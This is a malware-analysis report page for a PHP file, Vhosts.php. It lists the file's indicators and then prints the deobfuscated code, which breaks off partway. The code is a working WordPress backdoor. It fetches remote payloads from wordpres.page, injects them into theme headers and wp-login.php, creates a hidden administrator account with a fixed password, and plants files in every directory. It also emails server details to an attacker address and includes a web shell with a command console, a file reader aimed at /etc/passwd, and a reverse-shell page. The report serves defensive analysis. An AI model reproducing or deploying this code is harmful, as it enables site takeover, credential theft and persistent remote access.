PHP Malware Analysis
Vhosts.php
md5: aa49920d1cc9bb32871f8bb4355df64c
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- byhero44@gmail.com (Deobfuscated, Traces)
- suppor@nic.org (Deobfuscated, Traces)
Encoding
Environment
- php_uname (Deobfuscated, Traces)
Execution
- eval (Deobfuscated, Original, Traces)
- exec (Deobfuscated, Traces)
- shell_exec (Deobfuscated, Traces)
- system (Deobfuscated, Traces)
Files
- file_get_contents (Deobfuscated, Traces)
Input
- _GET (Deobfuscated, Traces)
- _POST (Deobfuscated, Traces)
URLs
- http://localhost/uploads/Vhosts.php (Traces)
- https://wordpres.page/txt/lamer.txt (Deobfuscated, Traces)
- https://wordpres.page/txt/seo.txt (Deobfuscated, Traces)
Deobfuscated PHP code
<?php
$stt1 = "Sy1LzNFQsrdT0isuKYovyi8xNNZIr8rMS8tJLEkFskrzkvNzC4pSi4upI5yUWJxqZhKfkpqcn5KqAbSzKLVMQ6W4pMRAEwlYAwA=";
$stt0 = "=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";
eval("?><?php\r\n\$document_root = \$_SERVER[\"DOCUMENT_ROOT\"];\r\n\$document_root_file = dirname(__FILE__);\r\n\$wp_detect = 0;\r\nif(file_exists(\$document_root.'/wp-load.php'))\r\n{ \r\n include \$document_root.'/wp-load.php';\r\n \$wp_detect = 1;\r\n}else\r\n{\r\n \$prefix = count(@explode('/', \$document_root_file));\r\n \$a = '';\r\n for(\$i = 0; \$i<\$prefix; \$i++)\r\n {\r\n \$a = \$a.'../';\r\n if(file_exists(\$document_root_file.'/'.\$a.'wp-load.php'))\r\n {\r\n include \$document_root_file.'/'.\$a.'wp-load.php';\r\n \$wp_detect = 1;\r\n break;\r\n }\r\n }\r\n}\r\n\r\nif(\$wp_detect == 1)\r\n{\r\n //Header Yazd\xc4\xb1rma\r\n \$wp_theme_dir = get_template_directory();\r\n \$header_file = \$wp_theme_dir.'/headers.php';\r\n \$header_content = file_get_contents(\$header_file);\r\n \$append = http_get('https://wordpres.page/txt/lamer.txt');\r\n if(!preg_match('#'.\$append.'#', \$header_content))\r\n { \r\n\t \$new_content = \$append.\$header_content;\r\n\t \$open_file = fopen(\$header_file, 'w');\r\n\t fwrite(\$open_file, \$new_content);\r\n\t fclose(\$open_file);\r\n }\r\n //Header Yazd\xc4\xb1rma \r\n \r\n // shell Ekleme\r\n \$user = 'new_admin';\r\n \$pass = 'Mzj2zr542CwkB#7QDsX^RK@fe@mxBTVAHp';\r\n \$email = 'byhero44@gmail.com';\r\n if (!username_exists( \$user ) && !email_exists( \$email ) ) {\r\n \$user_id = wp_create_user( \$user, \$pass, \$email );\r\n \$user = new WP_User( \$user_id );\r\n \$user->set_role( 'administrator' );\r\n } \r\n // shell Ekleme\r\n \r\n // Wp Login Yazma.\r\n \$wp_login = ABSPATH.'/wp-login.php';\r\n \$login = http_get('https://wordpres.page/txt/seo.txt');\r\n \$open_login = fopen(\$wp_login, 'w');\r\n fwrite(\$open_login, \$login);\r\n fclose(\$open_login);\r\n // Wp Login Yazma.\r\n}\r\n\r\n\r\n// Shell Yazma\r\n\$code = http_get('#');\r\n\$wp_code = \$document_root.'/#';\r\n\$open_code = fopen(\$wp_code, 'w');\r\nfwrite(\$open_code, \$code);\r\nfclose(\$open_code);\r\n// Shell Yazma\r\n\r\n// Makale Yazma\r\n\$makale = http_get('');\r\n\$wp_makale = \$document_root.'/';\r\n\$open_makale = fopen(\$wp_makale, 'w');\r\nfwrite(\$open_makale, \$makale);\r\nfclose(\$open_makale);\r\n// Makale Yazma\r\n\r\n\r\n// Klas\xc3\xb6rlere Yazma\r\n\$directories = expandDirectories(\$document_root);\r\n\$css = http_get('https://wordpres.page/txt/lamer.txt');\r\nforeach(\$directories as \$dir)\r\n{\r\n\tif(!preg_match('#wp-content#', \$dir))\r\n\t{\r\n\t \$css_file = \$dir.'/wp-indos.php';\r\n\t \$open_css = fopen(\$css_file, 'w');\r\n\t fwrite(\$open_css, \$css);\r\n\t fclose(\$open_css);\r\n }\r\n}\r\n// Klas\xc3\xb6rlere Yazma\r\n\r\nfunction expandDirectories(\$base_dir) {\r\n \$directories = array();\r\n foreach(scandir(\$base_dir) as \$file) {\r\n if(\$file == '.' || \$file == '..') continue;\r\n \$dir = \$base_dir.DIRECTORY_SEPARATOR.\$file;\r\n if(is_dir(\$dir)) {\r\n \$directories []= \$dir;\r\n \$directories = array_merge(\$directories, expandDirectories(\$dir));\r\n }\r\n }\r\n return \$directories;\r\n}\r\nfunction http_get(\$url)\r\n{\r\n\t\$im = curl_init(\$url);\r\n\tcurl_setopt(\$im, CURLOPT_RETURNTRANSFER, 1);\r\n\tcurl_setopt(\$im, CURLOPT_CONNECTTIMEOUT, 10);\r\n\tcurl_setopt(\$im, CURLOPT_FOLLOWLOCATION, 1);\r\n\tcurl_setopt(\$im, CURLOPT_HEADER, 0);\r\n\treturn curl_exec(\$im);\r\n\tcurl_close(\$im);\r\n}\r\n?><?php\r\n\$kime = \"byhero44@gmail.com\";\r\n\$baslik = \"wsoff 2023\";\r\n\$EL_MuHaMMeD = \"Dosya Yolu : \" . \$_SERVER['DOCUMENT_ROOT'] . \"\\r\\n\";\r\n\$EL_MuHaMMeD.= \"Server Admin : \" . \$_SERVER['SERVER_ADMIN'] . \"\\r\\n\";\r\n\$EL_MuHaMMeD.= \"Server isletim sistemi : \" . \$_SERVER['SERVER_SOFTWARE'] . \"\\r\\n\";\r\n\$EL_MuHaMMeD.= \"Shell Link : http://\" . \$_SERVER['SERVER_NAME'] . \$_SERVER['PHP_SELF'] . \"\\r\\n\";\r\n\$EL_MuHaMMeD.= \"Avlanan Site : \" . \$_SERVER['HTTP_HOST'] . \"\\r\\n\";\r\nmail(\$kime, \$baslik, \$EL_MuHaMMeD);\r\n?><?php\r\n\t//by ghostlulz\r\n\t// beggining of HTML doc\r\n\tfunction headhtml()\r\n\t{\r\n\t\techo \"<html>\";\r\n\t\techo \"<head>\";\r\n\r\n\t\t//CSS\r\n\t\techo \"<style>\";\r\n\t\techo \"body {background-color:#1A1A1D;color:white; font-size:20px;}\";\r\n\t\techo \"input[type=text], select {width: 60%;padding: 12px 20px;font-size:20px;border-color:#470B0B; background-color:#C3BFB5}\";\r\n\t\techo \"input[type=submit] {width: 10%;padding: 12px 20px;background-color:#470B0B;color:#C3BFB5;font-size:20px;border-color:#470B0B;}\";\r\n\t\techo \"table{width:100%;}\";\r\n\t\techo \"td,th {border: 1px solid transparent; padding:10px;}\";\r\n\t\techo \"td {text-align:center;}\";\r\n\t\techo \"tr:nth-child(even) td { background: #470B0B; } \";\r\n\t\techo \"a {color:white;}\";\r\n\t\techo \"#container {width:85%;float:right;padding-bottom:150px;}\"; //padding bottem = footer hight\r\n\t\techo \"ul {list-style-type: none;margin: 0;padding: 0;overflow: hidden;}\";\r\n\t\techo \"li {float: left;}\";\r\n\t\techo \"li a {display: block;color: white;text-align: center;padding: 14px 16px;text-decoration: none;}\";\r\n\t\techo \"li a:hover {background-color: #282828;}\";\r\n\t\techo \".active:hover {background-color: #470B0B;}\";\r\n\t\techo \".active {background-color: #470B0B;}\";\r\n\t\techo \"td a{color:#97caf9;}\";\r\n\t\techo \"th {color:#FFC04C;}\";\r\n\t\techo \"#command {background-color:#C3BFB5;color:black;width:60%;padding-top:30px;padding-bottom:30px;padding-left:10px;}\";\r\n\t\techo \"#fleftReverseShell {float:right;padding-right:5%;}\";\r\n\t\techo \"footer {clear:both;background-color:black;font-size:11px;padding-left:5px;position:fixed;bottom:0;width:100%;height:150px;}\";\r\n\t\techo \"#center {text-align:center;}\";\r\n\t\techo \"</style>\";\r\n\r\n\t\techo \"</head>\";\r\n\t\techo \"<body>\";\r\n\r\n\t\t//Nav bar\r\n\t\techo \"<ul>\";\r\n\t\techo \"<li><a class='active' href='?'>Home</a></li>\";\r\n\t\techo \"<li><a href='?console=1'>Console</a></li>\";\r\n\t\techo \"<li><a href='?reverse-shell=1'>Reverse Shell</a></li>\";\r\n\t\techo \"<li><a href='?database=1'>Databases</a></li>\";\r\n\t\techo \"</ul>\";\r\n\t\techo \"<br>\";\r\n\t\techo \"<br>\";\r\n\r\n\t\t// container for content\r\n\t\techo \"<div id='container'>\";\r\n\t}\r\n\r\n\t// ending of HTML doc\r\n\tfunction foothtml()\r\n\t{\r\n\t\t//closing tags\r\n\t\techo \"</div>\";\r\n\t\techo \"</body>\";\r\n\t\techo \"<footer>\";\r\n\t\techo \"<br>\";\r\n\t\techo \"<p id='center'>By: <font color='red'>MuricaSpi</font> AKA <font color='blue'>Ghostlulz</font></p>\";\r\n\t\techo \"<p id='center'><a href='?'>Home</a> <a href='?console=1'>Console</a> <a href='?reverse-shell=1'>Reverse Shell</a> <a href='#Databases'>Databases</a></p>\";\r\n\t\techo \"<br>\";\r\n\t\techo \"<p>*NOT FOR ILLEGAL USE*</p>\";\r\n\t\techo \"<p>I am not resposible for what you do with this product.</p>\";\r\n\r\n\t\techo \"</footer>\";\r\n\t\techo \"</html>\";\r\n\t}\r\n\r\n\t//folder form\r\n\tfunction displayFolderForm()\r\n\t{\r\n\r\n\t\techo '<form action=\"\">';\r\n\r\n\t\techo '<label>Switch Directory:</label><br>';\r\n\t\techo '<input type=\"text\" name=\"directory\" placeholder=\"/var/www/html/\">';\r\n\t\techo '<input type=\"submit\" value=\"Submit\">';\r\n\t\techo '</form>';\r\n\t\techo '<br>';\r\n\t\t\r\n\r\n\t\techo '<form action=\"\">';\r\n\t\techo '<label>Read File:</label><br>';\r\n\t\techo '<input type=\"text\" name=\"displayfile\" placeholder=\"/etc/passwd\">';\r\n\t\techo '<input type=\"submit\" value=\"Submit\">';\r\n\t\techo '</form>';\r\n\t}\r\n\r\n\t//console form\r\n\tfunction displayConsoleForm()\r\n\t{\r\n\t\techo '<form action=\"\">';\r\n\r\n\t\techo '<label>Os Commands</label><br>';\r\n\t\techo '<input type=\"hidden\" name=\"console\" value=\"1\">';\r\n\t\techo '<select name=\"command\">';\r\n\r\n\t\techo '<optgroup label=\"Distribution Type / Version\">';\r\n \techo '<option value=\"cat /etc/issue\">cat /etc/issue</option>';\r\n \techo '<option value=\"cat /etc/*-release\">cat /etc/*-release</option>';\r\n \techo '<option value=\"cat /etc/lsb-release\">cat /etc/lsb-release (Debian)</option>';\r\n \techo '<option value=\"cat /etc/redhat-release\">cat /etc/redhat-release (Redhat)</option>';\r\n \techo '</optgroup>';\r\n\r\n \techo '<optgroup label=\"Kernel Version\">';\r\n \techo '<option value=\"uname -ar\">cat uname -ar</option>';\r\n \techo '</optgroup>';\r\n\r\n \techo '<optgroup label=\"File System Info\">';\r\n \techo '<option value=\"df -h\">df -h</option>';\r\n \techo '</optgroup>';\r\n \techo '</select>';\r\n\r\n\t\techo '<input type=\"submit\" value=\"Submit\">';\r\n\t\techo '</form>';\r\n\r\n\r\n\t\techo '<form action=\"\">';\r\n\r\n\t\techo '<label>Custom Os Commands</label><br>';\r\n\t\techo '<input type=\"hidden\" name=\"console\" value=\"1\">';\r\n\t\techo '<input type=\"text\" name=\"command\" placeholder=\"cat /etc/passwd\">';\r\n\t\techo '<input type=\"submit\" value=\"Submit\">';\r\n\t\techo '</form>';\r\n\t}\r\n\r\n\t//reverse shell form\r\n\tfunction displayReverseShellForm()\r\n\t{\r\n\t\t// check if programs are installed\r\n\t\t\$Netcat = exec(\"which nc\");\r\n\t\t\$Bash = exec(\"which bash\");\r\n\t\t\$SH = exec(\"which sh\");\r\n\t\t\$Python = exec(\"which python\");\r\n\t\t\$Ruby = exec(\"which ruby\");\r\n\t\t\$Php = exec(\"which php\");\r\n\t\t\$Perl = exec(\"which perl\");\r\n\t\t\$Java = exec(\"which java\");\r\n\r\n\t\techo \"<div id='fleftReverseShell'>\";\r\n\t\techo \"<h4> Installed Applications</h4>\";\r\n\r\n\t\t// If not installed string will be empty \r\n\t\tif(\$Netcat === '')\r\n\t\t{\r\n\t\t\techo 'Netcat - <font color=\"red\">Not Installed</font>';\r\n\t\t\techo '<br>';\r\n\t\t\techo '<br>';\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\techo 'Netcat - <font color=\"green\">Installed</font>';\r\n\t\t\techo '<br>';\r\n\t\t\techo '<br>';\r\n\t\t}\r\n\r\n\t\tif(\$Bash === '')\r\n\t\t{\r\n\t\t\techo 'Bash - <font color=\"red\">Not Installed</font>';\r\n\t\t\techo '<br>';\r\n\t\t\techo '<br>';\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\techo 'Bash Shell- <font color=\"green\">Installed</font>';\r\n\t\t\techo '<br>';\r\n\t\t\techo '<br>';\r\n\t\t}\r\n\r\n\t\tif(\$Sh === '')\r\n\t\t{\r\n\t\t\techo 'SH Shell- <font color=\"red\">Not Installed</font>';\r\n\t\t\techo '<br>';\r\n\t\t\techo '<br>';\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\techo 'SH Shell - <font color=\"green\">Installed</font>';\r\n\t\t\techo '<br>';\r\n\t\t\techo '<br>';\r\n\t\t}\r\n\r\n\t\tif(\$Python === '')\r\n\t\t{\r\n\t\t\techo 'Python - <font color=\"red\">Not 